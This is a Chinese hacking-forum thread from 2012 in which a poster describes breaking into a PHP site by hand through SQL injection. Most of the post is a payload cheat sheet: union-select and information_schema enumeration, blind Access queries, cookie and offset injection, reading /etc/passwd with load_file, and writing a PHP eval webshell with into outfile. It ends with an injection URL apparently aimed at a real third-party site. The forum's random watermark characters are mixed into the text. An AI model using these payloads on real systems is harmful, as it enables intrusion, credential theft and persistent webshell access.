找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3274|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~; L  x! `9 k% {3 D; [4 d
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?! M  H6 C  }9 n* H$ m4 A
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。8 V3 s) e5 D9 E- d8 _" u3 v
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。), X- \9 f- i& H+ K  I  |
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
, p, A" ]$ o1 F, |6 n5 d这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:: K  b1 k& l) Z1 D5 x
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
4 y" {& D, y' X) c8 l, o/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入& r9 o3 |. b' \! ^
                         7 b0 j- m0 F& P# ~* B* P
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,2 k5 |7 V$ L2 G
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意* k/ l1 w; n. P# F" `/ Q
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
3 W; f. }  ~' s" C2 c5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
' E$ m4 L3 [, y7 B4 s& B8 W有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
' ~% g* [" X% P8 |2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
& H1 z1 q+ @% K# P! A9 Q1 k; `我就用的是第二个思路,
4 ]' O, f/ t& V) n5 ^) D提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  " f% X1 C4 _; N3 N3 O
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,5 p( f: x1 x( |* t. U$ J) O8 N7 u
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
0 u, E. m/ m2 p  A  ?注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
2 a" I9 B2 s) }+ E7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????! M1 D! R2 P# C- L+ T( B( j( k2 Z8 o1 W
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....1 y  u, w1 u  a& I# x' p* t+ D
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
( U& ~( }6 n& k! @7 z; p, J然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,5 w& p2 M9 b; m2 [
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
& I( ^+ K, x1 ]下面是一些很普遍注入方式资料:- n1 d) y2 A, D2 H# W' w# d# v
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
- ~5 \8 |6 N2 m: K( L拆半法( l( C9 z. T$ L6 e
######################################6 R  T% p6 y1 ~) {# p
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
6 |7 F. S! A0 @9 C( R/ Y1 [and exists (select * from admin)
+ n3 e0 M7 z0 Band exists(select id from admin)2 a% M% e. t" v9 E# T8 G
and exists(select id from admin where id=1)" z. y1 v9 z* L  J; G
and exists(select id from admin where id>1) & j6 c# S- f8 }' {" }" R
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 1 v1 h% j  ]' D* P
and exists (select username from admin)
/ {& k  }: S6 j- ]and exists (select password from admin)
; W7 @" z" M1 M' P! j, a3 Land exists (select id from admin where len(username)<10 and id=1)
5 S% |1 \. ~& s$ \& k) X! K* Sand exists (select id from admin where len(username)>5 and id=1)3 G  T) H5 s" ?2 p6 Z' M
and exists (select id from admin where len(username)=6 and id=1)3 P6 n2 M) U0 m- [+ h
and exists (select id from admin where len(password)<10 and id=1)3 ?% a  a4 ^  x' r
and exists (select id from admin where len(password)>5 and id=1)" d! k4 v1 |& f) j
and exists (select id from admin where len(password)=7 and id=1)
7 p! V9 n. G# P5 _and (select top 1 asc(mid(username,1,1)) from admin)=978 r* ]1 e( n% |7 `* J
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
! A  o9 N9 |3 _# n" K  A猜第二位把username,1,1改成username,2,1就可以了。
1 n1 O. y0 R/ ~猜密码把username改成password就OK了  b2 L; Q+ Y1 P2 Z. d
##################################################  i0 m# {  K. ]& E; L
搜索型注入* [3 r5 R0 T/ H
##################################
) G, t4 {! {, X# D( I1 ^%' and 1=1 and '%'='
/ N+ g0 l+ J  F% W1 |2 |' E%' and exists (select * from admin) and '%'='
9 B) Z- w& @& C# d- C- c%' and exists(select id from admin where id=1) and '%'='& ^2 b$ ?" l) V2 F" T
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
, d! h/ I! y1 D/ n%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
+ E% V$ y1 H" U: i3 _# B+ \# B%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='/ J2 }, h7 }0 H$ ^% H
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='1 |" m  O/ F4 w1 g
对于MSSQL数据库,后面可以吧 and '%'='换成--* `, N3 R" ?6 F; C* n
还有一点搜索型注入也可以使用union语句。, v$ Q  N0 {( i# [
########################################################
8 H3 ~4 L" w7 Y/ @" J) [联合查询。- \* h3 b% m, ~
#####################################6 u4 j* I* [; `+ j9 ^  M. m" q/ e
order by 10
/ M$ j4 h1 ]# }2 e/ F0 Q) O1 V  iand 1=2 union select 1,2,3,4,5,6,7,8,9,10
4 o. _6 P+ r4 j/ S; E, A7 Yand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
4 [' @% t9 v2 i$ \and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1+ V/ t- \% l% U: G
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)3 G& s1 f- s" j' u# a  v- @, J
###################################
; @' {* u* y0 ocookie注入1 r1 s- ?" s5 \# G
###############################' Z, p  ~" {( }( y% [) R5 \/ D
http://www.******.com/shownews.asp?id=1275 r; ^, l! D8 _0 T
http://www.******.com/shownews.asp3 f: y' Z/ q" M1 r" O0 V9 X3 i
alert(="id="+escape("127"));
# g% s* H, o- salert(="id="+escape("127 and 1=1"));5 y8 P: C* ?! q  ]8 _3 o( l- M5 S
alert(="id="+escape("127 order by 10"));, b. z8 F( n; z$ \# E* O
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
; l$ y7 m9 Q. v$ |# Dalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
! U; W2 Y* ]3 o* ?6 p4 T  _这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
( g  @- ]4 A5 E% g' B* y; G& s###################################
1 l2 z5 f/ T7 }% u偏移注入
* u$ f3 x# K; `* a###########################################################
! F  R4 C# ]' F- K; munion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin! q- Y- ?* ?/ G1 V: d6 e% ]
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
8 ?0 q: k  l, Bunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)9 A; U) y# O3 {% T" O8 Y
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)+ K: m: B# H7 L
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
" i8 p9 L+ P% U, H, V( B+ h" zunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)/ w) n+ S* U; D0 T+ v% d
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
7 T- P# c( Y1 i  N# Ca.id=d.id)
5 Y8 W! D* s8 @( Y7 B, G5 |$ dand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
- C7 L+ w8 s6 \7 G% W$ ]; ?: Yand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
  \2 G) i/ A! x! M  P  
$ v  f* c5 O$ v5 T9 z/ y============================================================================================================
8 G; p; A5 y' `8 P! U  X' e9 u1.判断版本, O6 ?& P* p2 F& }. R7 M
and ord(mid(version(),1,1))>514 |' p) M" k- _8 X* E
返回正常,说明大于4.0版本,支持ounion查询. R. h+ M7 j' p( n, t8 W. {
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解' ]8 d- X' E; A2 U$ P+ D9 t
and 2=4 union select 1,2,3,4,5,6,7,8,9--0 `3 |* }! ?7 T- [" C
3.查看数据库版本及当前用户,# \. g) b8 W7 S4 s/ @, t% c; {" ~( z/ |
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--8 H( o7 R6 {7 b! q; a6 r7 H
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
# s+ _- A8 g) a- k$ ^" X4.判断有没有写权限: s* B3 G4 O+ G2 q
and (select count(*) from MySQL.user)>0--
# o9 K! [" I! c* z) H4 V' Z6 w) W# h% V5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
8 e2 x& ?- p3 v- \0 S用不了这个命令,就学习土耳其黑客手法,如下/ y9 m/ b# F* A, j
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--/ I6 z5 l- K% f; {5 w1 M: h( [- O
6.爆表,爆库0 ?2 ]# A: Y% F/ j0 ~3 v; r/ [
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
: i0 \0 z; y0 @6 `2 g0 {7.爆列名,爆表
" r+ G6 {/ V0 _' Z$ b- qand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
% Q* I" H! ], o8.查询字段数,直接用limit N,1去查询,直接N到报错为止。' L) r' g+ h7 Y4 u8 k
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
! U" T( l5 X3 h. z+ \& z) q0 N9.爆字段内容6 c" e/ ]! _) |& L+ ^
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
* ]2 Y0 e  W6 n4 u( H. \$ ~5 ^4 `5 Ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表